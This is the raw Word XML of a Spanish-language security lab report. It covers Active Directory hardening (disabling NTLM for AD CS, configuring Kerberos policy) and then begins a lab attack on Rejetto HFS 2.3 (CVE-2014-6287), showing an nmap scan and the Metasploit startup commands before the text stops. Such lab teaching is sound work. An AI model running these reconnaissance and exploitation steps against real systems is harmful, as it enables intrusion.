                    <a:blip r:embed="rId187">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3971429" cy="4847619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E92E9" w14:textId="77777777" w:rsidR="007E787E" w:rsidRDefault="007E787E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021DE385" w14:textId="77777777" w:rsidR="007E787E" w:rsidRDefault="007E787E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66362731" w14:textId="6A217B9A" w:rsidR="007E787E" w:rsidRDefault="007E787E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora desactivaremos </w:t>
      </w:r>
      <w:r w:rsidR="00524052">
        <w:t>NTLM para cualquier servidor de AD CS, para esto nos iremos a políticas de grupo del dominio y allí:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13430EE3" w14:textId="5DA04FC7" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEACCBF" w14:textId="300363FC" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D1F7CF0" wp14:editId="6417B124">
            <wp:extent cx="6645910" cy="5029200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1076141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1621" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5029200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF21508" w14:textId="0EC31D9E" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E3E0AD" w14:textId="065F259A" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y en propiedades lo modificaremos como la imagen siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE501D5" w14:textId="77777777" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133860D7" w14:textId="67E171E5" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EDB3CAD" wp14:editId="4BB3948F">
            <wp:extent cx="4009524" cy="4752381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="233485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5142" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4009524" cy="4752381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEE4E0" w14:textId="77777777" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AF17B7" w14:textId="4274BE48" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y le daremos en aplicar y aceptar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D597995" w14:textId="77777777" w:rsidR="00524052" w:rsidRDefault="00524052" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234A7D96" w14:textId="340AA210" w:rsidR="00524052" w:rsidRDefault="00F45841" w:rsidP="00524052">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos activar Kerberos</w:t>
      </w:r>
      <w:r w:rsidR="00524052">
        <w:t>, pare eso vamos al Administrador de directivas del dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D1FB5" w14:textId="7BC0A474" w:rsidR="00F45841" w:rsidRDefault="00F45841" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35063B3C" w14:textId="77777777" w:rsidR="00795D4E" w:rsidRDefault="00795D4E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9EB646" w14:textId="77777777" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A10DDC6" w14:textId="3C3B8A67" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53396689" wp14:editId="0A3966BB">
            <wp:extent cx="6645910" cy="5327650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1789816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6713" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId190">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5327650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD9584" w14:textId="77777777" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A5B002" w14:textId="0B09E44D" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Iremos desde Configuración del equipo -&gt; Configuración de Windows -&gt; Configuración de </w:t>
      </w:r>
      <w:r w:rsidR="007E787E">
        <w:t>seguridad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Directiva Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C34268" w14:textId="77777777" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6E853D" w14:textId="63A7745F" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Configurándolo como esta en la imagen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC4AB2" w14:textId="77777777" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F70B382" w14:textId="4A1FA679" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y con esto ya estaría, pero hay que recordar que esto se tendría que hacer en todos los controladores de domino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A0F11" w14:textId="77777777" w:rsidR="00F025B2" w:rsidRDefault="00F025B2" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5B92B4" w14:textId="5762DE21" w:rsidR="003D7556" w:rsidRDefault="003D7556" w:rsidP="007E787E">
      <w:pPr>
        <w:pStyle w:val="ll"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="322" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0017D6B7" w14:textId="77777777" w:rsidR="003D7556" w:rsidRDefault="003D7556" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3049BDAD" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB14887" w14:textId="77777777" w:rsidR="001D590F" w:rsidRDefault="001D590F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7313FC74" w14:textId="38580EDA" w:rsidR="00F95C4F" w:rsidRDefault="00F95C4F" w:rsidP="00F95C4F">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc135575990"/>
      <w:r w:rsidRPr="00227F29">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Servidor de archivos HTTP Rejetto (HFS) 2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2014-6287CVE-2014-6287</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="6EDF4F63" w14:textId="77777777" w:rsidR="000D35E1" w:rsidRDefault="000D35E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7C1B68" w14:textId="4FB726F9" w:rsidR="00B74D8C" w:rsidRDefault="00B74D8C" w:rsidP="00B74D8C">
      <w:r>
        <w:t xml:space="preserve">El objetivo de este ataque será conseguir tener acceso a la </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Windows 10 unido al dominio google.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E70583" w14:textId="77777777" w:rsidR="00B74D8C" w:rsidRDefault="00B74D8C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199AF4A4" w14:textId="4756E4D5" w:rsidR="00F04517" w:rsidRPr="00F04517" w:rsidRDefault="00F04517" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F04517">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>CVE-2014-6287</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44567A" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F04517">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>La función findMacroMarker en parserLib.pas en Rejetto HTTP File Server (también conocido como HFS o HTTP Fileserver) 2.3x anterior a 2.3c permite a atacantes remotos ejecutar programas arbitrarios a través de una secuencia %00 en una acción de búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5464D" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0111BEC9" w14:textId="662F73A6" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Este es la instancia del programa ejecutándose en la máquina Windows 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE8931" w14:textId="77777777" w:rsidR="00E42799" w:rsidRDefault="00E42799" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266DA1DC" w14:textId="42515111" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449FC5E7" wp14:editId="3221C8EF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="192652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5183" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"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360DE5AB" w14:textId="07BAF0D5" w:rsidR="00F04517" w:rsidRDefault="00E42799" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>El usuario que usaré será la cuenta de ‘usuario’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAA710" w14:textId="77777777" w:rsidR="00E42799" w:rsidRDefault="00E42799" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276F6C73" w14:textId="77777777" w:rsidR="00E42799" w:rsidRDefault="00E42799" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6ECD4A" w14:textId="0E84C53F" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00B74D8C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora con nmap identificaremos el servicio corriendo en el puerto 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C27934" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006B5F1A" w14:textId="0F96C37A" w:rsidR="00F04517" w:rsidRPr="00F04517" w:rsidRDefault="00F04517" w:rsidP="00F04517">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25D5D007" wp14:editId="0788228F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="80010"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1567543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0F8E0ED2" w14:textId="7FEDE656" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                            <w:r>
                              <w:t>sudo nmap -sV -p 80 192.168.1.135</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BB84708" w14:textId="0FA0ABDE" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                            <w:r>
                              <w:t>-sV -&gt; Para detectar versiones.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B213836" w14:textId="65808CA6" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                            <w:r>
                              <w:t>-p -&gt; El puerto que vamos escanear.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30EC2BEE" w14:textId="0A1868FE" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                            <w:r>
                              <w:t>Y por último la IP del host al que vamos escan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D5D007" id="_x0000_s1051" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517155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0F8E0ED2" w14:textId="7FEDE656" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                      <w:r>
                        <w:t>sudo nmap -sV -p 80 192.168.1.135</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BB84708" w14:textId="0FA0ABDE" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                      <w:r>
                        <w:t>-sV -&gt; Para detectar versiones.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B213836" w14:textId="65808CA6" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                      <w:r>
                        <w:t>-p -&gt; El puerto que vamos escanear.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30EC2BEE" w14:textId="0A1868FE" w:rsidR="00F04517" w:rsidRDefault="00F04517">
                      <w:r>
                        <w:t>Y por último la IP del host al que vamos escanear.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE1AFD" w14:textId="77777777" w:rsidR="000D35E1" w:rsidRDefault="000D35E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4551C36D" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FFCFA9" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57469263" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F32441B" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5B6607" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66048BCF" w14:textId="77777777" w:rsidR="00F04517" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76ECCE47" w14:textId="77777777" w:rsidR="000D35E1" w:rsidRDefault="000D35E1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC44365" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBA0E54" w14:textId="1468A115" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA0676">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF86E4F" wp14:editId="578733ED">
            <wp:extent cx="5400040" cy="5394325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3819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3253" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId192" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5394325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41449283" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17170441" w14:textId="0D5B6854" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iniciaremos metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA41C1" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B3FA3F" w14:textId="0E3BD0D0" w:rsidR="00AA0676" w:rsidRDefault="00AA0676" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="27C667B2" wp14:editId="1575E93A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="67945"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="641477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4D9400B4" w14:textId="149A4406" w:rsidR="00AA0676" w:rsidRDefault="00AA0676">
                            <w:r>
                              <w:t>sudo msfdb init &amp;&amp; sudo msfconsole</w:t>
                            </w:r>
                            <w:r w:rsidR="00E42799">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>sudo msfdb init &amp;&amp; sudo msfconsole -q</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BD42233" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676"/>
                          <w:p w14:paraId="352DAEC1" w14:textId="1B6FEEDA" w:rsidR="00AA0676" w:rsidRDefault="00AA0676">
                            <w:r>
                              <w:t>Lo primero que hago es iniciar la base de datos de metasploit, después inicio metasploit con la opción -q para que solo parezcan mensajes de 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C667B2" id="_x0000_s1052" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517176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&#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NHNnz2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4D9400B4" w14:textId="149A4406" w:rsidR="00AA0676" w:rsidRDefault="00AA0676">
                      <w:r>
                        <w:t>sudo msfdb init &amp;&amp; sudo msfconsole</w:t>
                      </w:r>
                      <w:r w:rsidR="00E42799">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:t>sudo msfdb init &amp;&amp; sudo msfconsole -q</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BD42233" w14:textId="77777777" w:rsidR="00AA0676" w:rsidRDefault="00AA0676"/>
                    <w:p w14:paraId="352DAEC1" w14:textId="1B6FEEDA" w:rsidR="00AA0676" w:rsidRDefault="00AA0676">
                      <w:r>
                        <w:t>Lo primero que hago es iniciar la base de datos de metasploit, después inicio metasploit con la opción -q para que solo parezcan mensajes de error.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
